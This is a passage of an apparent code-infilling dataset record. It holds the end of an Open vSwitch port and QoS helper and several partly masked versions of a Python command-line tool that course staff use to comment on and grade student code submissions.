self.integration_bridge).execute()\n return target in controllers\n\n def check_controller_fail_mode(self, fail_mode):\n return fail_mode == self._db_get_val('Bridge',\n self.integration_bridge,\n 'fail_mode')\n\n def get_virtual_tunnel_ports(self):\n ifaces = self.ovsdb.db_find(\n 'Interface', ('options', '=', {'remote_ip': 'flow'}),\n columns=['uuid', 'name', 'type']).execute()\n tunnel_ports = []\n for iface in ifaces:\n if (self.integration_bridge !=\n self._get_bridge_for_iface(iface['name'])):\n continue\n\n tunnel_ports.append(\n ovs.OvsPort(\n id=str(iface['uuid']),\n name=iface['name'],\n tunnel_type=iface['type'],\n ),\n )\n\n return tunnel_ports\n\n def add_virtual_tunnel_port(self, tunnel_type):\n self.ovsdb.add_virtual_tunnel_port(tunnel_type).execute()\n\n def delete_port(self, switch_port):\n self.ovsdb.del_port(switch_port.name,\n self.integration_bridge).execute()\n\n @staticmethod\n def _check_ofport(port_name, ofport):\n if ofport is None:\n LOG.warning(\"Can't find ofport for port %s.\", port_name)\n return False\n if ofport < OFPORT_RANGE_MIN or ofport > OFPORT_RANGE_MAX:\n LOG.warning(\"ofport %(ofport)s for port %(port)s is invalid.\",\n {'ofport': ofport, 'port': port_name})\n return False\n\n return True\n\n def get_interface_by_id_with_specified_columns(self, port_id,\n specified_columns):\n columns = {'external_ids', 'name'}\n columns.update(specified_columns)\n ifaces = self.ovsdb.db_find(\n 'Interface', ('external_ids', '=', {'iface-id': port_id}),\n columns=columns).execute()\n\n for iface in ifaces:\n if (self.integration_bridge !=\n self._get_bridge_for_iface(iface['name'])):\n # iface-id is the port id in neutron, the same neutron port\n # might create multiple interfaces in different bridges\n continue\n return iface\n\n def get_port_ofport_by_id(self, port_id):\n iface = self.get_interface_by_id_with_specified_columns(\n port_id, {'name', 'ofport'})\n if iface and self._check_ofport(iface['name'], iface['ofport']):\n return iface['ofport']\n\n def get_local_port_mac_in_use(self, port_id):\n iface = self.get_interface_by_id_with_specified_columns(\n port_id, {'mac_in_use'})\n if iface and netaddr.valid_mac(iface['mac_in_use']):\n return iface['mac_in_use']\n\n def _get_port_name_by_id(self, port_id):\n ifaces = self.ovsdb.db_find(\n 'Interface', ('external_ids', '=', {'iface-id': port_id}),\n columns=['external_ids', 'name']).execute()\n for iface in ifaces:\n if (self.integration_bridge !=\n self._get_bridge_for_iface(iface['name'])):\n # iface-id is the port id in neutron, the same neutron port\n # might create multiple interfaces in different bridges\n continue\n\n return iface['name']\n\n def _gen_link_mapping(self, bridge1, bridge2,\n bridge1_link_name=None,\n bridge2_link_name=None):\n if bridge1_link_name is None:\n bridge1_link_name = \"%s-patch\" % bridge2\n if bridge2_link_name is None:\n bridge2_link_name = \"%s-patch\" % bridge1\n\n LOG.debug('genrated mappings {%(bridge1)s: %(link1)s,'\n ' %(bridge2)s: %(link2)s}',\n {'bridge1': bridge1,\n 'link1': bridge1_link_name,\n 'bridge2': bridge2,\n 'link2': bridge2_link_name})\n return (bridge1_link_name, bridge2_link_name)\n\n def map_patch_to_network(self, network, patch_name):\n self.bridge_mapping[network] = patch_name\n\n def get_phy_network_ofport(self, network):\n patch_name = self.bridge_mapping.get(network)\n if patch_name:\n return self.get_port_ofport(patch_name)\n\n def create_patch_pair(self, local_bridge, peer_bridge,\n local_link_name=None, peer_link_name=None):\n links = self._gen_link_mapping(\n local_bridge,\n peer_bridge,\n local_link_name,\n peer_link_name)\n self._create_patch_port(\n local_bridge,\n links[0],\n peer_bridge,\n links[1])\n self._create_patch_port(\n peer_bridge,\n links[1],\n local_bridge,\n links[0])\n return links\n\n def _create_patch_port(self, bridge, port, peer, peer_port):\n if cfg.CONF.df.enable_dpdk:\n self.ovsdb.add_br(bridge, datapath_type='netdev').execute()\n else:\n self.ovsdb.add_br(bridge, datapath_type='system').execute()\n if not self.patch_port_exist(port):\n self.ovsdb.add_patch_port(bridge, port, peer, peer_port).execute()\n\n def patch_port_exist(self, port):\n return 'patch' == self._db_get_val('Interface', port, 'type',\n check_error=False,\n log_errors=False)\n\n def get_port_ofport(self, port):\n return self._db_get_val('Interface', port, 'ofport',\n check_error=False, log_errors=False)\n\n def get_port_mac_in_use(self, port):\n return self._db_get_val('Interface', port, 'mac_in_use',\n check_error=False, log_errors=False)\n\n def get_port_qos(self, port_id):\n port_qoses = self.ovsdb.db_find(\n 'QoS', ('external_ids', '=', {'iface-id': port_id}),\n columns=['external_ids', '_uuid']).execute()\n if port_qoses:\n ovsdb_qos = port_qoses[0]\n external_ids = ovsdb_qos['external_ids']\n return qos.QosPolicy(\n id=external_ids.get('qos-id'),\n topic=external_ids.get('qos-topic'),\n version=external_ids.get('version'),\n )\n\n def set_port_qos(self, port_id, qos):\n port_name = self._get_port_name_by_id(port_id)\n if not port_name:\n return\n\n max_kbps = qos.get_max_kbps()\n max_burst_kbps = qos.get_max_burst_kbps()\n with self.ovsdb.transaction(check_error=True) as txn:\n qos_uuid = txn.add(self.ovsdb.create_qos(port_id, qos))\n txn.add(self.ovsdb.db_set('Interface', port_name,\n ('ingress_policing_rate', max_kbps),\n ('ingress_policing_burst',\n max_burst_kbps)))\n txn.add(self.ovsdb.db_set('Port', port_name, ('qos', qos_uuid)))\n\n def update_port_qos(self, port_id, qos):\n port_name = self._get_port_name_by_id(port_id)\n if not port_name:\n return\n\n max_kbps = qos.get_max_kbps()\n max_burst_kbps = qos.get_max_burst_kbps()\n with self.ovsdb.transaction(check_error=True) as txn:\n txn.add(self.ovsdb.db_set('Interface', port_name,\n ('ingress_policing_rate', max_kbps),\n ('ingress_policing_burst',\n max_burst_kbps)))\n txn.add(self.ovsdb.update_qos(port_id, qos))\n\n def clear_port_qos(self, port_id):\n port_name = self._get_port_name_by_id(port_id)\n if not port_name:\n return\n\n with self.ovsdb.transaction(check_error=True) as txn:\n txn.add(self.ovsdb.db_set('Interface', port_name,\n ('ingress_policing_rate', 0),\n ('ingress_policing_burst', 0)))\n txn.add(self.ovsdb.db_set('Port', port_name, ('qos', [])))\n txn.add(self.ovsdb.delete_qos(port_id))\n\n def delete_port_qos_and_queue(self, port_id):\n self.ovsdb.delete_qos(port_id).execute()\n\n def get_vtp_ofport(self, tunnel_type):\n return self.get_port_ofport(tunnel_type + '-vtp')\n", "step-ids": [ 18, 23, 25, 27, 35 ] }
[ 18, 23, 25, 27, 35 ]
<|reserved_special_token_0|> class Grade(NamedTuple): score: int message: str comments: List[Comment] def clear(): os.system('cls' if os.name == 'nt' else 'clear') <|reserved_special_token_0|> def complete(comment): if comment.fields: print('Please provide supplementary information:') field_vals = {} for field in comment.fields: q = {'type': 'input', 'name': 'field', 'message': field + ':'} response = wrapped_prompt(q) field_vals[field] = response['field'] complete_text = comment.comment.format(**field_vals) q = {'type': 'input', 'name': 'final', 'message': 'Final message', 'default': complete_text} response = wrapped_prompt(q) return Comment(comment.line_num, response['final']) def add_comment(accepted_comments, new_comment): if not new_comment: return if new_comment.line_num not in accepted_comments: accepted_comments[new_comment.line_num] = [] accepted_comments[new_comment.line_num].append(new_comment) class Interrupt(Exception): def __init__(self, cmd): super() self.cmd = cmd <|reserved_special_token_0|> def wrapped_input(q): try: ret = input(q) except KeyboardInterrupt: return receive_command() return ret <|reserved_special_token_0|> def grade_backup(problems): comments = [] try: for name, problem in problems.items(): comments.extend(grade_problem(name, problem)) score, message = grade(comments) print(message) q = {'type': 'confirm', 'name': 'ok', 'message': 'Does this grade look reasonable?'} response = wrapped_prompt(q) return Grade(score, message, comments) except Interrupt as e: if e.cmd == 'reset': return grade_backup(problems) raise def grade_problem(name, problem): readline.set_completer(template_completer(name)) try: accepted_comments = {} for comment in problem.comments: try: display_code_with_accepted_and_potential_comments(name, problem, accepted_comments, comment) print(f'{Fore.CYAN}Potential comment: {Style.RESET_ALL}') print( f'{Fore.GREEN}{comment.line_num}{Style.RESET_ALL} {comment.comment}' ) q = {'type': 'confirm', 'name': 'ok', 'message': 'Add comment', 'default': True} response = wrapped_prompt(q) if response['ok']: add_comment(accepted_comments, complete(comment)) except Interrupt as e: if e.cmd == 'cancel': continue raise while True: try: display_code_with_accepted_and_potential_comments(name, problem, accepted_comments) response = wrapped_input( f'? {Style.BRIGHT} Custom comment type: {Style.RESET_ALL}') if not response: q = {'type': 'confirm', 'name': 'ok', 'message': 'Go to next question?', 'default': True} response = wrapped_prompt(q) if response['ok']: break continue if response not in templates: print( f'{Fore.RED} Template {response} not found! {Style.RESET_ALL}' ) continue text = templates[response] q = {'type': 'input', 'name': 'line_num', 'message': 'Line number:'} response = wrapped_prompt(q) try: line_num = int(response['line_num']) except ValueError: print( f"{Fore.RED} Expected a number, received {response['line_num']} not found! {Style.RESET_ALL}" ) continue if text: fields = list(set(re.findall('{(.*?)}', text))) comment = Comment(line_num, text, fields) add_comment(accepted_comments, complete(comment)) else: q = {'type': 'input', 'name': 'text', 'message': 'Comment:' } response = wrapped_prompt(q) comment = Comment(line_num, response['text'], []) add_comment(accepted_comments, comment) except Interrupt as e: if e.cmd == 'cancel': continue raise print() return list(sum(accepted_comments.values(), [])) except Interrupt as e: if e.cmd == 'clear': return grade_problem(name, problem) raise <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class Grade(NamedTuple): score: int message: str comments: List[Comment] def clear(): os.system('cls' if os.name == 'nt' else 'clear') def display_code_with_accepted_and_potential_comments(name, problem, accepted_comments, curr_comment=None): clear() print(f'Problem: {name}') highlighted_code = highlight(problem.code, PythonLexer(), TerminalFormatter()) for i, line in enumerate(highlighted_code.split('\n')): line_num = problem.initial_line_number + i if (line_num in accepted_comments or curr_comment and line_num == curr_comment.line_num): print() print(f'{Fore.GREEN}{line_num} {Style.RESET_ALL}{line}') if (line_num in accepted_comments or curr_comment and line_num == curr_comment.line_num): indent_level = len(line) - len(line.strip()) + 3 if line_num in accepted_comments: for accepted_comment in accepted_comments[line_num]: print(Fore.MAGENTA + ' ' * indent_level + '# ' + accepted_comment.comment) if curr_comment and line_num == curr_comment.line_num: print(Fore.RED + Style.BRIGHT + ' ' * indent_level + '# ' + curr_comment.comment) print() print() def complete(comment): if comment.fields: print('Please provide supplementary information:') field_vals = {} for field in comment.fields: q = {'type': 'input', 'name': 'field', 'message': field + ':'} response = wrapped_prompt(q) field_vals[field] = response['field'] complete_text = comment.comment.format(**field_vals) q = {'type': 'input', 'name': 'final', 'message': 'Final message', 'default': complete_text} response = wrapped_prompt(q) return Comment(comment.line_num, response['final']) def add_comment(accepted_comments, new_comment): if not new_comment: return if new_comment.line_num not in accepted_comments: accepted_comments[new_comment.line_num] = [] accepted_comments[new_comment.line_num].append(new_comment) class Interrupt(Exception): def __init__(self, cmd): super() self.cmd = cmd def wrapped_prompt(q): ret = prompt([q]) if not ret: receive_command() return ret def wrapped_input(q): try: ret = input(q) except KeyboardInterrupt: return receive_command() return ret def receive_command(): inp = input( f""" cancel = cancel this comment clear = clear all question comments reset = reset all student comments ? {Style.BRIGHT}{Fore.RED}command: {Style.RESET_ALL}""" ) raise Interrupt(inp) <|reserved_special_token_0|> def grade_backup(problems): comments = [] try: for name, problem in problems.items(): comments.extend(grade_problem(name, problem)) score, message = grade(comments) print(message) q = {'type': 'confirm', 'name': 'ok', 'message': 'Does this grade look reasonable?'} response = wrapped_prompt(q) return Grade(score, message, comments) except Interrupt as e: if e.cmd == 'reset': return grade_backup(problems) raise def grade_problem(name, problem): readline.set_completer(template_completer(name)) try: accepted_comments = {} for comment in problem.comments: try: display_code_with_accepted_and_potential_comments(name, problem, accepted_comments, comment) print(f'{Fore.CYAN}Potential comment: {Style.RESET_ALL}') print( f'{Fore.GREEN}{comment.line_num}{Style.RESET_ALL} {comment.comment}' ) q = {'type': 'confirm', 'name': 'ok', 'message': 'Add comment', 'default': True} response = wrapped_prompt(q) if response['ok']: add_comment(accepted_comments, complete(comment)) except Interrupt as e: if e.cmd == 'cancel': continue raise while True: try: display_code_with_accepted_and_potential_comments(name, problem, accepted_comments) response = wrapped_input( f'? {Style.BRIGHT} Custom comment type: {Style.RESET_ALL}') if not response: q = {'type': 'confirm', 'name': 'ok', 'message': 'Go to next question?', 'default': True} response = wrapped_prompt(q) if response['ok']: break continue if response not in templates: print( f'{Fore.RED} Template {response} not found! {Style.RESET_ALL}' ) continue text = templates[response] q = {'type': 'input', 'name': 'line_num', 'message': 'Line number:'} response = wrapped_prompt(q) try: line_num = int(response['line_num']) except ValueError: print( f"{Fore.RED} Expected a number, received {response['line_num']} not found! {Style.RESET_ALL}" ) continue if text: fields = list(set(re.findall('{(.*?)}', text))) comment = Comment(line_num, text, fields) add_comment(accepted_comments, complete(comment)) else: q = {'type': 'input', 'name': 'text', 'message': 'Comment:' } response = wrapped_prompt(q) comment = Comment(line_num, response['text'], []) add_comment(accepted_comments, comment) except Interrupt as e: if e.cmd == 'cancel': continue raise print() return list(sum(accepted_comments.values(), [])) except Interrupt as e: if e.cmd == 'clear': return grade_problem(name, problem) raise <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class Grade(NamedTuple): score: int message: str comments: List[Comment] def clear(): os.system('cls' if os.name == 'nt' else 'clear') def display_code_with_accepted_and_potential_comments(name, problem, accepted_comments, curr_comment=None): clear() print(f'Problem: {name}') highlighted_code = highlight(problem.code, PythonLexer(), TerminalFormatter()) for i, line in enumerate(highlighted_code.split('\n')): line_num = problem.initial_line_number + i if (line_num in accepted_comments or curr_comment and line_num == curr_comment.line_num): print() print(f'{Fore.GREEN}{line_num} {Style.RESET_ALL}{line}') if (line_num in accepted_comments or curr_comment and line_num == curr_comment.line_num): indent_level = len(line) - len(line.strip()) + 3 if line_num in accepted_comments: for accepted_comment in accepted_comments[line_num]: print(Fore.MAGENTA + ' ' * indent_level + '# ' + accepted_comment.comment) if curr_comment and line_num == curr_comment.line_num: print(Fore.RED + Style.BRIGHT + ' ' * indent_level + '# ' + curr_comment.comment) print() print() def complete(comment): if comment.fields: print('Please provide supplementary information:') field_vals = {} for field in comment.fields: q = {'type': 'input', 'name': 'field', 'message': field + ':'} response = wrapped_prompt(q) field_vals[field] = response['field'] complete_text = comment.comment.format(**field_vals) q = {'type': 'input', 'name': 'final', 'message': 'Final message', 'default': complete_text} response = wrapped_prompt(q) return Comment(comment.line_num, response['final']) def add_comment(accepted_comments, new_comment): if not new_comment: return if new_comment.line_num not in accepted_comments: accepted_comments[new_comment.line_num] = [] accepted_comments[new_comment.line_num].append(new_comment) class Interrupt(Exception): def __init__(self, cmd): super() self.cmd = cmd def wrapped_prompt(q): ret = prompt([q]) if not ret: receive_command() return ret def wrapped_input(q): try: ret = input(q) except KeyboardInterrupt: return receive_command() return ret def receive_command(): inp = input( f""" cancel = cancel this comment clear = clear all question comments reset = reset all student comments ? {Style.BRIGHT}{Fore.RED}command: {Style.RESET_ALL}""" ) raise Interrupt(inp) def main(): readline.parse_and_bind('tab: complete') readline.set_completer_delims('') print('cli.py main') for id in get_backup_ids(): try: code = get_backup_code(id) problems = get_problems(code) except Exception: print( f'{Fore.RED}An exception occurred while processing backup id #{id}' , file=sys.stderr) traceback.print_exc(file=sys.stderr) print(f'{Style.RESET_ALL}') continue grade = grade_backup(problems) for comment in grade.comments: print(comment) assert not comment.fields, 'fields not substituted!' submit_comment(id, comment.line_num, comment.comment) submit_grade(id, grade.score, grade.message) def grade_backup(problems): comments = [] try: for name, problem in problems.items(): comments.extend(grade_problem(name, problem)) score, message = grade(comments) print(message) q = {'type': 'confirm', 'name': 'ok', 'message': 'Does this grade look reasonable?'} response = wrapped_prompt(q) return Grade(score, message, comments) except Interrupt as e: if e.cmd == 'reset': return grade_backup(problems) raise def grade_problem(name, problem): readline.set_completer(template_completer(name)) try: accepted_comments = {} for comment in problem.comments: try: display_code_with_accepted_and_potential_comments(name, problem, accepted_comments, comment) print(f'{Fore.CYAN}Potential comment: {Style.RESET_ALL}') print( f'{Fore.GREEN}{comment.line_num}{Style.RESET_ALL} {comment.comment}' ) q = {'type': 'confirm', 'name': 'ok', 'message': 'Add comment', 'default': True} response = wrapped_prompt(q) if response['ok']: add_comment(accepted_comments, complete(comment)) except Interrupt as e: if e.cmd == 'cancel': continue raise while True: try: display_code_with_accepted_and_potential_comments(name, problem, accepted_comments) response = wrapped_input( f'? {Style.BRIGHT} Custom comment type: {Style.RESET_ALL}') if not response: q = {'type': 'confirm', 'name': 'ok', 'message': 'Go to next question?', 'default': True} response = wrapped_prompt(q) if response['ok']: break continue if response not in templates: print( f'{Fore.RED} Template {response} not found! {Style.RESET_ALL}' ) continue text = templates[response] q = {'type': 'input', 'name': 'line_num', 'message': 'Line number:'} response = wrapped_prompt(q) try: line_num = int(response['line_num']) except ValueError: print( f"{Fore.RED} Expected a number, received {response['line_num']} not found! {Style.RESET_ALL}" ) continue if text: fields = list(set(re.findall('{(.*?)}', text))) comment = Comment(line_num, text, fields) add_comment(accepted_comments, complete(comment)) else: q = {'type': 'input', 'name': 'text', 'message': 'Comment:' } response = wrapped_prompt(q) comment = Comment(line_num, response['text'], []) add_comment(accepted_comments, comment) except Interrupt as e: if e.cmd == 'cancel': continue raise print() return list(sum(accepted_comments.values(), [])) except Interrupt as e: if e.cmd == 'clear': return grade_problem(name, problem) raise <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> parser.add_argument('proj', help= "Run 'python3 cli.py <proj>', where <proj> is one of the following: hog cats ants scheme" ) <|reserved_special_token_0|> parser.add_argument('proj', help= "Run 'python3 cli.py <proj>', where <proj> is one of the following: hog cats ants scheme" ) <|reserved_special_token_0|> class Grade(NamedTuple): score: int message: str comments: List[Comment] def clear(): os.system('cls' if os.name == 'nt' else 'clear') def display_code_with_accepted_and_potential_comments(name, problem, accepted_comments, curr_comment=None): clear() print(f'Problem: {name}') highlighted_code = highlight(problem.code, PythonLexer(), TerminalFormatter()) for i, line in enumerate(highlighted_code.split('\n')): line_num = problem.initial_line_number + i if (line_num in accepted_comments or curr_comment and line_num == curr_comment.line_num): print() print(f'{Fore.GREEN}{line_num} {Style.RESET_ALL}{line}') if (line_num in accepted_comments or curr_comment and line_num == curr_comment.line_num): indent_level = len(line) - len(line.strip()) + 3 if line_num in accepted_comments: for accepted_comment in accepted_comments[line_num]: print(Fore.MAGENTA + ' ' * indent_level + '# ' + accepted_comment.comment) if curr_comment and line_num == curr_comment.line_num: print(Fore.RED + Style.BRIGHT + ' ' * indent_level + '# ' + curr_comment.comment) print() print() def complete(comment): if comment.fields: print('Please provide supplementary information:') field_vals = {} for field in comment.fields: q = {'type': 'input', 'name': 'field', 'message': field + ':'} response = wrapped_prompt(q) field_vals[field] = response['field'] complete_text = comment.comment.format(**field_vals) q = {'type': 'input', 'name': 'final', 'message': 'Final message', 'default': complete_text} response = wrapped_prompt(q) return Comment(comment.line_num, response['final']) def add_comment(accepted_comments, new_comment): if not new_comment: return if new_comment.line_num not in accepted_comments: accepted_comments[new_comment.line_num] = [] accepted_comments[new_comment.line_num].append(new_comment) class Interrupt(Exception): def __init__(self, cmd): super() self.cmd = cmd def wrapped_prompt(q): ret = prompt([q]) if not ret: receive_command() return ret def wrapped_input(q): try: ret = input(q) except KeyboardInterrupt: return receive_command() return ret def receive_command(): inp = input( f""" cancel = cancel this comment clear = clear all question comments reset = reset all student comments ? {Style.BRIGHT}{Fore.RED}command: {Style.RESET_ALL}""" ) raise Interrupt(inp) def main(): readline.parse_and_bind('tab: complete') readline.set_completer_delims('') print('cli.py main') for id in get_backup_ids(): try: code = get_backup_code(id) problems = get_problems(code) except Exception: print( f'{Fore.RED}An exception occurred while processing backup id #{id}' , file=sys.stderr) traceback.print_exc(file=sys.stderr) print(f'{Style.RESET_ALL}') continue grade = grade_backup(problems) for comment in grade.comments: print(comment) assert not comment.fields, 'fields not substituted!' submit_comment(id, comment.line_num, comment.comment) submit_grade(id, grade.score, grade.message) def grade_backup(problems): comments = [] try: for name, problem in problems.items(): comments.extend(grade_problem(name, problem)) score, message = grade(comments) print(message) q = {'type': 'confirm', 'name': 'ok', 'message': 'Does this grade look reasonable?'} response = wrapped_prompt(q) return Grade(score, message, comments) except Interrupt as e: if e.cmd == 'reset': return grade_backup(problems) raise def grade_problem(name, problem): readline.set_completer(template_completer(name)) try: accepted_comments = {} for comment in problem.comments: try: display_code_with_accepted_and_potential_comments(name, problem, accepted_comments, comment) print(f'{Fore.CYAN}Potential comment: {Style.RESET_ALL}') print( f'{Fore.GREEN}{comment.line_num}{Style.RESET_ALL} {comment.comment}' ) q = {'type': 'confirm', 'name': 'ok', 'message': 'Add comment', 'default': True} response = wrapped_prompt(q) if response['ok']: add_comment(accepted_comments, complete(comment)) except Interrupt as e: if e.cmd == 'cancel': continue raise while True: try: display_code_with_accepted_and_potential_comments(name, problem, accepted_comments) response = wrapped_input( f'? {Style.BRIGHT} Custom comment type: {Style.RESET_ALL}') if not response: q = {'type': 'confirm', 'name': 'ok', 'message': 'Go to next question?', 'default': True} response = wrapped_prompt(q) if response['ok']: break continue if response not in templates: print( f'{Fore.RED} Template {response} not found! {Style.RESET_ALL}' ) continue text = templates[response] q = {'type': 'input', 'name': 'line_num', 'message': 'Line number:'} response = wrapped_prompt(q) try: line_num = int(response['line_num']) except ValueError: print( f"{Fore.RED} Expected a number, received {response['line_num']} not found! {Style.RESET_ALL}" ) continue if text: fields = list(set(re.findall('{(.*?)}', text))) comment = Comment(line_num, text, fields) add_comment(accepted_comments, complete(comment)) else: q = {'type': 'input', 'name': 'text', 'message': 'Comment:' } response = wrapped_prompt(q) comment = Comment(line_num, response['text'], []) add_comment(accepted_comments, comment) except Interrupt as e: if e.cmd == 'cancel': continue raise print() return list(sum(accepted_comments.values(), [])) except Interrupt as e: if e.cmd == 'clear': return grade_problem(name, problem) raise if __name__ == '__main__': try: main() except: print(f'{Style.RESET_ALL}') <|reserved_special_token_1|> import os import re import sys import traceback import readline from typing import NamedTuple, List from PyInquirer import prompt from pygments import highlight from pygments.formatters.terminal import TerminalFormatter from pygments.lexers.python import PythonLexer import argparse parser = argparse.ArgumentParser(description='Enter project endpoint') parser.add_argument("proj", help="Run 'python3 cli.py <proj>', where <proj> is one of the following: hog cats ants scheme") args = parser.parse_args() proj = args.proj from analyzer import get_problems, Comment from finalizing import grade from ok_interface import get_backup_ids, get_backup_code, submit_comment, submit_grade from colorama import Fore, Style from templates import template_completer, templates import argparse import config parser = argparse.ArgumentParser(description='Enter project endpoint') parser.add_argument("proj", help="Run 'python3 cli.py <proj>', where <proj> is one of the following: hog cats ants scheme") args = parser.parse_args() config.proj = args.proj class Grade(NamedTuple): score: int message: str comments: List[Comment] def clear(): os.system("cls" if os.name == "nt" else "clear") def display_code_with_accepted_and_potential_comments( name, problem, accepted_comments, curr_comment=None ): clear() print(f"Problem: {name}") highlighted_code = highlight(problem.code, PythonLexer(), TerminalFormatter()) for i, line in enumerate(highlighted_code.split("\n")): line_num = problem.initial_line_number + i if line_num in accepted_comments or ( curr_comment and line_num == curr_comment.line_num ): print() print(f"{Fore.GREEN}{line_num} {Style.RESET_ALL}{line}") if line_num in accepted_comments or ( curr_comment and line_num == curr_comment.line_num ): indent_level = len(line) - len(line.strip()) + 3 if line_num in accepted_comments: for accepted_comment in accepted_comments[line_num]: print( Fore.MAGENTA + " " * indent_level + "# " + accepted_comment.comment ) if curr_comment and line_num == curr_comment.line_num: print( Fore.RED + Style.BRIGHT + " " * indent_level + "# " + curr_comment.comment ) print() print() def complete(comment): if comment.fields: print("Please provide supplementary information:") field_vals = {} for field in comment.fields: q = {"type": "input", "name": "field", "message": field + ":"} response = wrapped_prompt(q) field_vals[field] = response["field"] complete_text = comment.comment.format(**field_vals) q = { "type": "input", "name": "final", "message": "Final message", "default": complete_text, } response = wrapped_prompt(q) return Comment(comment.line_num, response["final"]) def add_comment(accepted_comments, new_comment): if not new_comment: return if new_comment.line_num not in accepted_comments: accepted_comments[new_comment.line_num] = [] accepted_comments[new_comment.line_num].append(new_comment) class Interrupt(Exception): def __init__(self, cmd): super() self.cmd = cmd def wrapped_prompt(q): ret = prompt([q]) if not ret: receive_command() return ret def wrapped_input(q): try: ret = input(q) except KeyboardInterrupt: return receive_command() return ret def receive_command(): inp = input( f"\n\n" f"cancel = cancel this comment\n" f"clear = clear all question comments\n" f"reset = reset all student comments\n" f"? {Style.BRIGHT}{Fore.RED}command: {Style.RESET_ALL}" ) raise Interrupt(inp) def main(): readline.parse_and_bind("tab: complete") readline.set_completer_delims("") print("cli.py main") for id in get_backup_ids(): try: code = get_backup_code(id) problems = get_problems(code) except Exception: print( f"{Fore.RED}An exception occurred while processing backup id #{id}", file=sys.stderr, ) traceback.print_exc(file=sys.stderr) print(f"{Style.RESET_ALL}") continue grade = grade_backup(problems) for comment in grade.comments: print(comment) assert not comment.fields, "fields not substituted!" submit_comment(id, comment.line_num, comment.comment) submit_grade(id, grade.score, grade.message) def grade_backup(problems): comments = [] try: for name, problem in problems.items(): comments.extend(grade_problem(name, problem)) score, message = grade(comments) print(message) q = { "type": "confirm", "name": "ok", "message": "Does this grade look reasonable?", } response = wrapped_prompt(q) return Grade(score, message, comments) except Interrupt as e: if e.cmd == "reset": return grade_backup(problems) raise def grade_problem(name, problem): readline.set_completer(template_completer(name)) try: accepted_comments = {} for comment in problem.comments: try: display_code_with_accepted_and_potential_comments( name, problem, accepted_comments, comment ) print(f"{Fore.CYAN}Potential comment: {Style.RESET_ALL}") print( f"{Fore.GREEN}{comment.line_num}{Style.RESET_ALL} {comment.comment}" ) q = { "type": "confirm", "name": "ok", "message": "Add comment", "default": True, } response = wrapped_prompt(q) if response["ok"]: add_comment(accepted_comments, complete(comment)) except Interrupt as e: if e.cmd == "cancel": continue raise while True: try: display_code_with_accepted_and_potential_comments( name, problem, accepted_comments ) response = wrapped_input( f"? {Style.BRIGHT} Custom comment type: {Style.RESET_ALL}" ) if not response: q = { "type": "confirm", "name": "ok", "message": "Go to next question?", "default": True, } response = wrapped_prompt(q) if response["ok"]: break continue if response not in templates: print( f"{Fore.RED} Template {response} not found! {Style.RESET_ALL}" ) continue text = templates[response] q = {"type": "input", "name": "line_num", "message": "Line number:"} response = wrapped_prompt(q) try: line_num = int(response["line_num"]) except ValueError: print( f"{Fore.RED} Expected a number, received {response['line_num']} not found! {Style.RESET_ALL}" ) continue if text: fields = list(set(re.findall(r"{(.*?)}", text))) comment = Comment(line_num, text, fields) add_comment(accepted_comments, complete(comment)) else: q = {"type": "input", "name": "text", "message": "Comment:"} response = wrapped_prompt(q) comment = Comment(line_num, response["text"], []) add_comment(accepted_comments, comment) except Interrupt as e: if e.cmd == "cancel": continue raise print() return list(sum(accepted_comments.values(), [])) except Interrupt as e: if e.cmd == "clear": return grade_problem(name, problem) raise if __name__ == "__main__": try: main() except: print(f"{Style.RESET_ALL}")
flexible
{ "blob_id": "bec3d8546cd7d27f7da48f5658480cf17c36a255", "index": 9462, "step-1": "<mask token>\n\n\nclass Grade(NamedTuple):\n score: int\n message: str\n comments: List[Comment]\n\n\ndef clear():\n os.system('cls' if os.name == 'nt' else 'clear')\n\n\n<mask token>\n\n\ndef complete(comment):\n if comment.fields:\n print('Please provide supplementary information:')\n field_vals = {}\n for field in comment.fields:\n q = {'type': 'input', 'name': 'field', 'message': field + ':'}\n response = wrapped_prompt(q)\n field_vals[field] = response['field']\n complete_text = comment.comment.format(**field_vals)\n q = {'type': 'input', 'name': 'final', 'message': 'Final message',\n 'default': complete_text}\n response = wrapped_prompt(q)\n return Comment(comment.line_num, response['final'])\n\n\ndef add_comment(accepted_comments, new_comment):\n if not new_comment:\n return\n if new_comment.line_num not in accepted_comments:\n accepted_comments[new_comment.line_num] = []\n accepted_comments[new_comment.line_num].append(new_comment)\n\n\nclass Interrupt(Exception):\n\n def __init__(self, cmd):\n super()\n self.cmd = cmd\n\n\n<mask token>\n\n\ndef wrapped_input(q):\n try:\n ret = input(q)\n except KeyboardInterrupt:\n return receive_command()\n return ret\n\n\n<mask token>\n\n\ndef grade_backup(problems):\n comments = []\n try:\n for name, problem in problems.items():\n comments.extend(grade_problem(name, problem))\n score, message = grade(comments)\n print(message)\n q = {'type': 'confirm', 'name': 'ok', 'message':\n 'Does this grade look reasonable?'}\n response = wrapped_prompt(q)\n return Grade(score, message, comments)\n except Interrupt as e:\n if e.cmd == 'reset':\n return grade_backup(problems)\n raise\n\n\ndef grade_problem(name, problem):\n readline.set_completer(template_completer(name))\n try:\n accepted_comments = {}\n for comment in problem.comments:\n try:\n display_code_with_accepted_and_potential_comments(name,\n problem, accepted_comments, comment)\n print(f'{Fore.CYAN}Potential comment: {Style.RESET_ALL}')\n print(\n f'{Fore.GREEN}{comment.line_num}{Style.RESET_ALL} {comment.comment}'\n )\n q = {'type': 'confirm', 'name': 'ok', 'message':\n 'Add comment', 'default': True}\n response = wrapped_prompt(q)\n if response['ok']:\n add_comment(accepted_comments, complete(comment))\n except Interrupt as e:\n if e.cmd == 'cancel':\n continue\n raise\n while True:\n try:\n display_code_with_accepted_and_potential_comments(name,\n problem, accepted_comments)\n response = wrapped_input(\n f'? {Style.BRIGHT} Custom comment type: {Style.RESET_ALL}')\n if not response:\n q = {'type': 'confirm', 'name': 'ok', 'message':\n 'Go to next question?', 'default': True}\n response = wrapped_prompt(q)\n if response['ok']:\n break\n continue\n if response not in templates:\n print(\n f'{Fore.RED} Template {response} not found! {Style.RESET_ALL}'\n )\n continue\n text = templates[response]\n q = {'type': 'input', 'name': 'line_num', 'message':\n 'Line number:'}\n response = wrapped_prompt(q)\n try:\n line_num = int(response['line_num'])\n except ValueError:\n print(\n f\"{Fore.RED} Expected a number, received {response['line_num']} not found! {Style.RESET_ALL}\"\n )\n continue\n if text:\n fields = list(set(re.findall('{(.*?)}', text)))\n comment = Comment(line_num, text, fields)\n add_comment(accepted_comments, complete(comment))\n else:\n q = 